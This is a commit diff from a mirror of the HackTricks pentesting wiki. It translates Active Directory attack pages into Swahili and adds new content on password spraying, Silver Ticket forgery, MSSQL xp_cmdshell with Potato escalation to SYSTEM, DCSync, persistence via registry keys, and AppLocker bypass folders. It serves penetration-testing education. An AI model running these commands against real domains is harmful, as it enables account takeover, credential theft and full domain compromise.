maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/windows-hardening/active-directory-methodology/password

Browse Source
This commit is contained in:
Translator 2025-09-03 17:21:12 +00:00
parent 0ac79808a3
commit a2560b10d7
4 changed files with 255 additions and 145 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/windows-hardening/active-directory-methodology/kerberos-authentication.md
View File

@ -1,7 +1,7 @@
# Kerberos Authentication
# Uthibitishaji wa Kerberos
{{#include ../../banners/hacktricks-training.md}}
**Angalia chapisho la ajabu kutoka:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
**Angalia chapisho la kushangaza kutoka:** [**https://www.tarlogic.com/en/blog/how-kerberos-works/**](https://www.tarlogic.com/en/blog/how-kerberos-works/)
{{#include ../../banners/hacktricks-training.md}}

109
src/windows-hardening/active-directory-methodology/password-spraying.md
View File

@ -5,16 +5,16 @@
## **Password Spraying**
Mara tu unapopata **valid usernames** kadhaa unaweza kujaribu **common passwords** zinazotumika zaidi (kumbuka password policy ya mazingira) kwa kila mtumiaji uliyegundua.\
Mara unapopata kadhaa za **valid usernames**, unaweza kujaribu **common passwords** (kumbuka password policy ya mazingira)\
Kwa chaguo-msingi, **minimum** **password** **length** ni **7**.
Orodha za common usernames zinaweza pia kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Orodha za **common usernames** pia zinaweza kuwa muhimu: [https://github.com/insidetrust/statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
Kumbuka kwamba unaweza **could lockout some accounts if you try several wrong passwords** (kwa chaguo-msingi zaidi ya 10).
Kumbuka kwamba unaweza lockout baadhi ya accounts ikiwa utajaribu several wrong passwords (kwa chaguo-msingi zaidi ya 10).
### Pata password policy
Ikiwa una user credentials au shell kama domain user unaweza **get the password policy with**:
Ikiwa una some user credentials au shell kama domain user unaweza kupata password policy kwa:
```bash
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
@ -47,16 +47,16 @@ crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9c
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka lockouts):**_
- [**spray**](https://github.com/Greenwolf/Spray) _**(unaweza kubainisha idadi ya jaribio ili kuepuka kufungiwa):**_
```bash
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
```
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI, WAKATI MENGINE HAIFANYI KAZI
- Kutumia [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - HAIPENDEKEZWI; WAKATI MWINGINE HAIFANYI KAZI
```bash
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
```
- Kwa kutumia moduli ya `scanner/smb/smb_login` ya **Metasploit**:
- Kwa moduli ya `scanner/smb/smb_login` ya **Metasploit**:
![](<../../images/image (745).png>)
@ -67,9 +67,9 @@ for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```
#### Kutoka Windows
#### Kutoka kwa Windows
- Na [Rubeus](https://github.com/Zer1t0/Rubeus) toleo lenye brute module:
- Kwa [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
```bash
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
@ -77,31 +77,63 @@ done
# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```
- Kwa kutumia [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwa domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwa domain na kuweka kikomo kwa majaribio kulingana nayo):
- Kwa [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (Inaweza kuunda watumiaji kutoka kwenye domain kwa chaguo-msingi na itapata sera ya nywila kutoka kwenye domain na itaweka kikomo kwa idadi ya majaribio kulingana nayo):
```bash
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```
- Kwa kutumia [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
- Kwa [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)
```
Invoke-SprayEmptyPassword
```
### Tambua na Uchukue Udhibiti wa Akaunti "Password must change at next logon" (SAMR)
Mbinu ya kimyakimya ni spray password isiyo hatari/tupu na kushika akaunti zinazorudisha STATUS_PASSWORD_MUST_CHANGE, ambayo inaonyesha kuwa password iliexpire kwa nguvu na inaweza kubadilishwa bila kujua ile ya zamani.
Mchakato:
- Orodhesha watumiaji (RID brute via SAMR) ili kujenga orodha ya malengo:
{{#ref}}
../../network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
{{#endref}}
```bash
# NetExec (null/guest) + RID brute to harvest users
netexec smb <dc_fqdn> -u '' -p '' --rid-brute | awk -F'\\\\| ' '/SidTypeUser/ {print $3}' > users.txt
```
- Spray password tupu na endelea kwenye hits ili kunyakua accounts ambazo zinapaswa kubadilishwa wakati wa next logon:
```bash
# Will show valid, lockout, and STATUS_PASSWORD_MUST_CHANGE among results
netexec smb <DC.FQDN> -u users.txt -p '' --continue-on-success
```
- Kwa kila hit, badilisha password kupitia SAMR kwa module ya NetExec (hakuna old password inahitajika wakati "must change" imewekwa):
```bash
# Strong complexity to satisfy policy
env NEWPASS='P@ssw0rd!2025#' ; \
netexec smb <DC.FQDN> -u <User> -p '' -M change-password -o NEWPASS="$NEWPASS"
# Validate and retrieve domain password policy with the new creds
netexec smb <DC.FQDN> -u <User> -p "$NEWPASS" --pass-pol
```
Vidokezo vya operesheni:
- Hakikisha saa ya host yako iko sawa na saa ya DC kabla ya operesheni zinazotegemea Kerberos: `sudo ntpdate <dc_fqdn>`.
- [+] bila (Pwn3d!) katika baadhi ya modules (kwa mfano, RDP/WinRM) ina maana creds ni sahihi lakini akaunti haina interactive logon rights.
## Brute Force
```bash
legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org
```
### Kerberos pre-auth spraying na LDAP targeting na PSO-aware throttling (SpearSpray)
Kerberos pre-authbased spraying hupunguza kelele ikilinganishwa na majaribio ya kuunga SMB/NTLM/LDAP na inalingana vizuri zaidi na sera za kufunga akaunti za AD. SpearSpray inachanganya LDAP-driven targeting, injini ya pattern, na ufahamu wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Pia inaweza kuweka lebo kwa principals walioathiriwa kwenye Neo4j kwa ajili ya BloodHound pathing.
Kerberos pre-authbased spraying inapunguza kelele ikilinganishwa na SMB/NTLM/LDAP bind attempts na inaendana vizuri zaidi na AD lockout policies. SpearSpray inaunganisha LDAP-driven targeting, injini ya pattern, na uelewa wa sera (domain policy + PSOs + badPwdCount buffer) ili kuspray kwa usahihi na kwa usalama. Inaweza pia ku-tag compromised principals katika Neo4j kwa BloodHound pathing.
Mawazo muhimu:
- Ugundaji wa watumiaji kupitia LDAP na paging na msaada wa LDAPS, kwa hiari kutumia vichujio vya LDAP vilivyobinafsishwa.
- Sera ya kufunga akaunti ya domain + kuchuja kwa kuzingatia PSO ili kuacha buffer ya majaribio inayoweza kusanidiwa (threshold) na kuepuka kufunga watumiaji.
- Thibitisho la Kerberos pre-auth likitumia fast gssapi bindings (huunda 4768/4771 kwenye DCs badala ya 4625).
- Uundaji wa nywila unaotegemea pattern, kwa kila mtumiaji kwa kutumia vigezo kama majina na thamani za muda zinazotokana na pwdLastSet ya kila mtumiaji.
- Udhibiti wa throughput kwa kutumia threads, jitter, na max requests per second.
- Uunganishaji wa hiari na Neo4j kuorodhesha watumiaji waliotekwa kwa BloodHound.
- LDAP user discovery with paging and LDAPS support, optionally using custom LDAP filters.
- Domain lockout policy + PSO-aware filtering ili kuacha buffer ya jaribio inayoweza kusanidiwa (kizingiti) na kuepuka kufunga watumiaji.
- Kerberos pre-auth validation using fast gssapi bindings (generates 4768/4771 on DCs instead of 4625).
- Pattern-based, per-user password generation using variables like names and temporal values derived from each users pwdLastSet.
- Throughput control with threads, jitter, and max requests per second.
- Optional Neo4j integration to mark owned users for BloodHound.
Matumizi ya msingi na ugundaji:
Matumizi ya msingi na ugunduzi:
```bash
# List available pattern variables
spearspray -l
@ -112,7 +144,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl
```
Kulenga na udhibiti wa mtindo:
Kulenga na udhibiti wa muundo:
```bash
# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
@ -121,7 +153,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME
```
Udhibiti wa kuficha na usalama:
Vidhibiti vya kujificha na usalama:
```bash
# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10
@ -129,7 +161,7 @@ spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local
# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2
```
Kuongeza taarifa kwa Neo4j/BloodHound:
Neo4j/BloodHound uboreshaji wa data:
```bash
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687
```
@ -142,29 +174,29 @@ Muhtasari wa mfumo wa pattern (patterns.txt):
{samaccountname}
{extra}{separator}{year}{suffix}
```
Vigezo vinavyopatikana ni pamoja na:
Available variables include:
- {name}, {samaccountname}
- Muda kutoka kwa pwdLastSet ya kila mtumiaji (au whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Msaidizi wa muundo na tokeni ya shirika: {separator}, {suffix}, {extra}
- Temporal from each users pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
- Composition helpers and org token: {separator}, {suffix}, {extra}
Vidokezo vya uendeshaji:
- Pendelea kuchunguza PDC-emulator kwa kutumia -dc ili kusoma badPwdCount na taarifa zinazohusiana na sera zilizo na mamlaka zaidi.
- Urejeshaji wa badPwdCount unachochewa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia kikomo na upangaji wa muda ili kukaa salama.
- Jaribio za Kerberos pre-auth zinaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujichanganya.
Operational notes:
- Pendelea kuuliza PDC-emulator kwa -dc ili kusoma badPwdCount yenye uhalali zaidi na taarifa zinazohusiana na sera.
- Urejeshaji wa badPwdCount unasababishwa kwenye jaribio lijalo baada ya dirisha la uchunguzi; tumia threshold na timing ili kuwa salama.
- Majaribio ya Kerberos pre-auth yanaonekana kama 4768/4771 katika DC telemetry; tumia jitter na rate-limiting ili kujizungusha.
> Vidokezo: Vipimo vya ukurasa wa LDAP vya chaguo-msingi vya SpearSpray ni 200; rekebisha kwa -lps inapobidi.
> Kidokezo: SpearSprays default LDAP page size is 200; rekebisha na -lps inapohitajika.
## Outlook Web Access
Kuna zana kadhaa za p**assword spraying outlook**.
There are multiples tools for p**assword spraying outlook**.
- Kwa [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- kwa [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
- Kwa kutumia [MSF Owa_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_login/)
- Kwa kutumia [MSF Owa_ews_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa_ews_login/)
- Kwa kutumia [Ruler](https://github.com/sensepost/ruler) (inayotegemewa!)
- Kwa kutumia [DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) (Powershell)
- Kwa kutumia [MailSniper](https://github.com/dafthack/MailSniper) (Powershell)
Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords to spray.
Ili kutumia yoyote ya zana hizi, unahitaji orodha ya watumiaji na password / orodha ndogo ya passwords za spray.
```bash
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
@ -183,7 +215,7 @@ Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / o
- [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
- [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
## Marejeleo
## Marejeo
- [https://github.com/sikumy/spearspray](https://github.com/sikumy/spearspray)
- [https://github.com/TarlogicSecurity/kerbrute](https://github.com/TarlogicSecurity/kerbrute)
@ -194,6 +226,7 @@ Ili kutumia mojawapo ya zana hizi, unahitaji orodha ya watumiaji na password / o
- [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
- [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
- [HTB Sendai 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
{{#include ../../banners/hacktricks-training.md}}

88
src/windows-hardening/active-directory-methodology/silver-ticket.md
View File

@ -2,17 +2,18 @@
{{#include ../../banners/hacktricks-training.md}}
## Silver ticket
Shambulio la **Silver Ticket** linahusisha unyakuzi wa tiketi za huduma katika mazingira ya Active Directory (AD). Njia hii inategemea **kupata hash ya NTLM ya akaunti ya huduma**, kama akaunti ya kompyuta, ili kuunda tiketi ya Ticket Granting Service (TGS). Kwa tiketi hii iliyoundwa, mshambuliaji anaweza kufikia huduma maalum kwenye mtandao, **akijifanya kuwa mtumiaji yeyote**, kwa kawaida akilenga haki za usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa ajili ya kuunda tiketi ni salama zaidi na si rahisi kugundulika.
Shambulio la **Silver Ticket** linahusisha matumizi mabaya ya service tickets katika Active Directory (AD) mazingira. Mbinu hii inategemea **kupata NTLM hash ya service account**, kama account ya kompyuta, ili kutengeneza Ticket Granting Service (TGS) ticket. Kwa ticket hii iliyotengenezwa, mshambuliaji anaweza kupata huduma maalumu kwenye mtandao, **kujifanya mtumiaji yeyote**, kwa kawaida akilenga vibali vya kiutawala. Inasisitizwa kwamba kutumia AES keys kutengeneza tiketi ni salama zaidi na kunagundulika kwa shida.
> [!WARNING]
> Silver Tickets ni rahisi kidogo kugundulika kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya akaunti ya huduma**, si akaunti ya krbtgt. Hata hivyo, zinapungukiwa na huduma maalum wanazolenga. Aidha, kuiba tu nenosiri la mtumiaji.
Zaidi ya hayo, ikiwa unavunja **nenosiri la akaunti na SPN** unaweza kutumia nenosiri hilo kuunda Silver Ticket ukijifanya kuwa mtumiaji yeyote kwa huduma hiyo.
> Silver Tickets zinaonekana kwa ugunduzi mdogo kuliko Golden Tickets kwa sababu zinahitaji tu **hash ya service account**, sio akaunti ya krbtgt. Hata hivyo, zimepungukiwa kwa huduma maalumu wanayolenga. Aidha, ikiwa utaiba nenosiri la akaunti yenye SPN unaweza kutumia nenosiri hilo kuunda Silver Ticket inayojifanya mtumiaji yeyote kwa huduma hiyo.
Kwa ajili ya kuunda tiketi, zana tofauti zinatumika kulingana na mfumo wa uendeshaji:
Kwa utengenezaji wa tiketi, zana tofauti zinatumiwa kulingana na mfumo wa uendeshaji:
### On Linux
### Kwenye Linux
```bash
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
@ -35,18 +36,50 @@ mimikatz.exe "kerberos::ptt <TICKET_FILE>"
# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```
The CIFS service is highlighted as a common target for accessing the victim's file system, but other services like HOST and RPCSS can also be exploited for tasks and WMI queries.
Huduma ya CIFS imeonyeshwa kama lengo la kawaida la kupata mfumo wa faili wa mwathiriwa, lakini huduma nyingine kama HOST na RPCSS pia zinaweza kutumika kwa ajili ya kazi na maombi ya WMI.
## Available Services
### Example: MSSQL service (MSSQLSvc) + Potato to SYSTEM
Kama una hash ya NTLM (au ufunguo wa AES) wa akaunti ya huduma ya SQL (kwa mfano, sqlsvc) unaweza kutengeneza TGS kwa MSSQL SPN na kujifanya mtumiaji yeyote kwa huduma ya SQL. Kutoka hapo, wezesha xp_cmdshell ili kutekeleza amri kama akaunti ya huduma ya SQL. Ikiwa token hiyo ina SeImpersonatePrivilege, unganisha Potato ili kupandisha hadhi hadi SYSTEM.
```bash
# Forge a silver ticket for MSSQLSvc (RC4/NTLM example)
python ticketer.py -nthash <SQLSVC_RC4> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn MSSQLSvc/<host.fqdn>:1433 administrator
export KRB5CCNAME=$PWD/administrator.ccache
# Connect to SQL using Kerberos and run commands via xp_cmdshell
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"
```
- Ikiwa muktadha unaopatikana una SeImpersonatePrivilege (mara nyingi ni kweli kwa akaunti za huduma), tumia toleo la Potato kupata SYSTEM:
```bash
# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"
```
Maelezo zaidi kuhusu kutumia vibaya MSSQL na kuwezesha xp_cmdshell:
{{#ref}}
abusing-ad-mssql.md
{{#endref}}
Muhtasari wa mbinu za Potato:
{{#ref}}
../windows-local-privilege-escalation/roguepotato-and-printspoofer.md
{{#endref}}
## Huduma Zinazopatikana
| Service Type | Service Silver Tickets |
| ------------------------------------------ | -------------------------------------------------------------------------- |
| WMI | <p>HOST</p><p>RPCSS</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Katika matukio mengine unaweza tu kuuliza: WINRM</p> |
| PowerShell Remoting | <p>HOST</p><p>HTTP</p><p>Kulingana na OS pia:</p><p>WSMAN</p><p>RPCSS</p> |
| WinRM | <p>HOST</p><p>HTTP</p><p>Katika baadhi ya matukio unaweza kuomba tu: WINRM</p> |
| Scheduled Tasks | HOST |
| Windows File Share, also psexec | CIFS |
| LDAP operations, included DCSync | LDAP |
| LDAP operations, included DCSync | <p>LDAP</p><p>ikiwa ni pamoja na DCSync</p> |
| Windows Remote Server Administration Tools | <p>RPCSS</p><p>LDAP</p><p>CIFS</p> |
| Golden Tickets | krbtgt |
@ -54,30 +87,29 @@ Using **Rubeus** you may **ask for all** these tickets using the parameter:
- `/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm`
### Silver tickets Event IDs
### Vitambulisho vya Matukio vya Silver Tickets
- 4624: Account Logon
- 4634: Account Logoff
- 4672: Admin Logon
- 4624: Kuingia kwa Akaunti
- 4634: Kuondoka/Kutoka kwa Akaunti
- 4672: Kuingia kwa Admin
## Persistence
## Uendelevu
To avoid machines from rotating their password every 30 days set `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` or you could set `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` to a bigger value than 30days to indicate the rotation perdiod when the machines password should be rotated.
Ili kuzuia mashine zisibadilishe nywila kila baada ya siku 30 weka `HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1` au unaweza kuweka `HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge` kwa thamani kubwa kuliko siku 30 kuonyesha kipindi cha mzunguko ambacho nywila ya mashine inapaswa kubadilishwa.
## Abusing Service tickets
In the following examples lets imagine that the ticket is retrieved impersonating the administrator account.
Katika mifano iliyofuata tufikirie tiketi imepatikana kwa kuigiza akaunti ya administrator.
### CIFS
With this ticket you will be able to access the `C$` and `ADMIN$` folder via **SMB** (if they are exposed) and copy files to a part of the remote filesystem just doing something like:
Kwa tiketi hii utaweza kufikia folda za `C$` na `ADMIN$` kupitia **SMB** (ikiwa zime wazi) na kunakili mafaili kwenye sehemu ya mfumo wa faili wa mbali kwa kufanya kitu kama:
```bash
dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp
```
Utapata pia uwezo wa kupata shell ndani ya mwenyeji au kutekeleza amri za kawaida ukitumia **psexec**:
Pia utaweza kupata shell ndani ya host au kutekeleza amri zozote kwa kutumia **psexec**:
{{#ref}}
../lateral-movement/psexec-and-winexec.md
@ -85,7 +117,7 @@ Utapata pia uwezo wa kupata shell ndani ya mwenyeji au kutekeleza amri za kawaid
### HOST
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa katika kompyuta za mbali na kutekeleza amri za kawaida:
Kwa ruhusa hii unaweza kuunda kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri zozote:
```bash
#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
@ -99,7 +131,7 @@ schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"
```
### HOST + RPCSS
Kwa tiketi hizi unaweza **kutekeleza WMI katika mfumo wa mwathirika**:
Kwa tikiti hizi unaweza **kutekeleza WMI kwenye mfumo wa mwathiriwa**:
```bash
#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
@ -109,7 +141,8 @@ Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlis
#You can also use wmic
wmic remote.computer.local list full /format:list
```
Pata **maelezo zaidi kuhusu wmiexec** katika ukurasa ufuatao:
Pata **maelezo zaidi kuhusu wmiexec** kwenye ukurasa ufuatao:
{{#ref}}
../lateral-movement/wmiexec.md
@ -117,11 +150,11 @@ Pata **maelezo zaidi kuhusu wmiexec** katika ukurasa ufuatao:
### HOST + WSMAN (WINRM)
Kwa ufikiaji wa winrm juu ya kompyuta unaweza **kuipata** na hata kupata PowerShell:
Ikiwa una ufikiaji wa winrm kwenye kompyuta unaweza **kuifikia** na hata kupata PowerShell:
```bash
New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
```
Check the following page to learn **njia zaidi za kuungana na mwenyeji wa mbali kwa kutumia winrm**:
Check the following page to learn **njia zaidi za kuunganishwa na mwenyeji wa mbali ukitumia winrm**:
{{#ref}}
@ -129,11 +162,11 @@ Check the following page to learn **njia zaidi za kuungana na mwenyeji wa mbali
{{#endref}}
> [!WARNING]
> Note that **winrm lazima iwe hai na inasikiliza** kwenye kompyuta ya mbali ili kuweza kuipata.
> Kumbuka kwamba **winrm lazima iwe imewezeshwa na ikisikiliza** kwenye kompyuta ya mbali ili kuifikia.
### LDAP
With this privilege you can dump the DC database using **DCSync**:
Kwa ruhusa hii unaweza dump DC database ukitumia **DCSync**:
```
mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt
```
@ -150,6 +183,7 @@ dcsync.md
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets)
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
- [https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027](https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027)
- [HTB Sendai 0xdf: Silver Ticket + Potato path](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)

199
src/windows-hardening/authentication-credentials-uac-and-efs/README.md
View File

@ -1,17 +1,17 @@
# Windows Security Controls
# Udhibiti wa Usalama wa Windows
{{#include ../../banners/hacktricks-training.md}}
## AppLocker Policy
## Sera ya AppLocker
Orodha ya programu inayoruhusiwa ni orodha ya programu za software au executable zilizothibitishwa ambazo zinaruhusiwa kuwepo na kuendesha kwenye mfumo. Lengo ni kulinda mazingira kutokana na malware hatari na programu zisizothibitishwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
Orodha nyeupe ya programu ni orodha ya programu za programu zilizokubaliwa au faili za utekelezaji zinazoruhusiwa kuwepo na kuendeshwa kwenye mfumo. Lengo ni kulinda mazingira dhidi ya malware hatari na programu zisizoruhusiwa ambazo hazilingani na mahitaji maalum ya biashara ya shirika.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni **ufumbuzi wa orodha ya programu za Microsoft** na inawapa wasimamizi wa mifumo udhibiti juu ya **ni programu na faili zipi watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executable, scripts, faili za installer za Windows, DLLs, programu zilizopakiwa, na waandishi wa programu zilizopakiwa.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na kuandika ufikiaji kwenye directories fulani, **lakini hii yote inaweza kupuuziliwa mbali**.
[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) ni suluhisho la Microsoft la **orodha nyeupe ya programu** na huwapa wasimamizi wa mfumo udhibiti juu ya **programu na faili ambazo watumiaji wanaweza kuendesha**. Inatoa **udhibiti wa kina** juu ya executables, scripts, Windows installer files, DLLs, packaged apps, na packed app installers.\
Ni kawaida kwa mashirika **kuzuia cmd.exe na PowerShell.exe** na upatikanaji wa kuandika kwa saraka fulani, **lakini yote haya yanaweza kuepukika**.
### Check
### Angalia
Angalia faili/nyongeza zipi zimeorodheshwa kwenye orodha ya mblacklist/mwhite list:
Angalia ni faili/viendelezi gani vimeorodheshwa kwenye orodha nyeusi au orodha nyeupe:
```bash
Get-ApplockerPolicy -Effective -xml
@ -20,60 +20,60 @@ Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$a = Get-ApplockerPolicy -effective
$a.rulecollections
```
Hii njia ya rejista inaelezea mipangilio na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
Njia hii ya rejista ina usanidi na sera zinazotumika na AppLocker, ikitoa njia ya kupitia seti ya sasa ya sheria zinazotekelezwa kwenye mfumo:
- `HKLM\Software\Policies\Microsoft\Windows\SrpV2`
### Bypass
- **Folda zinazoweza kuandikwa** zinazofaa kupita Sera ya AppLocker: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows` kuna **folda zinazoweza kuandikwa** ambazo unaweza kutumia **kupita hii**.
- Zinazofaa **Writable folders** za ku-bypass AppLocker Policy: Ikiwa AppLocker inaruhusu kutekeleza chochote ndani ya `C:\Windows\System32` au `C:\Windows`, kuna **writable folders** ambazo unaweza kutumia ili **bypass this**.
```
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing
```
- Binaries za kawaida **zilizoaminika** [**"LOLBAS's"**](https://lolbas-project.github.io/) zinaweza pia kuwa na manufaa kupita AppLocker.
- **Kanuni zilizoandikwa vibaya zinaweza pia kupitishwa**
- Kwa mfano, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, unaweza kuunda **folda inayoitwa `allowed`** mahali popote na itaruhusiwa.
- Mashirika mara nyingi pia yanazingatia **kuzuia `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, lakini yanasahau kuhusu **mengine** [**mikoa ya executable ya PowerShell**](https://www.powershelladmin.com/wiki/PowerShell_Executables_File_System_Locations) kama vile `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` au `PowerShell_ISE.exe`.
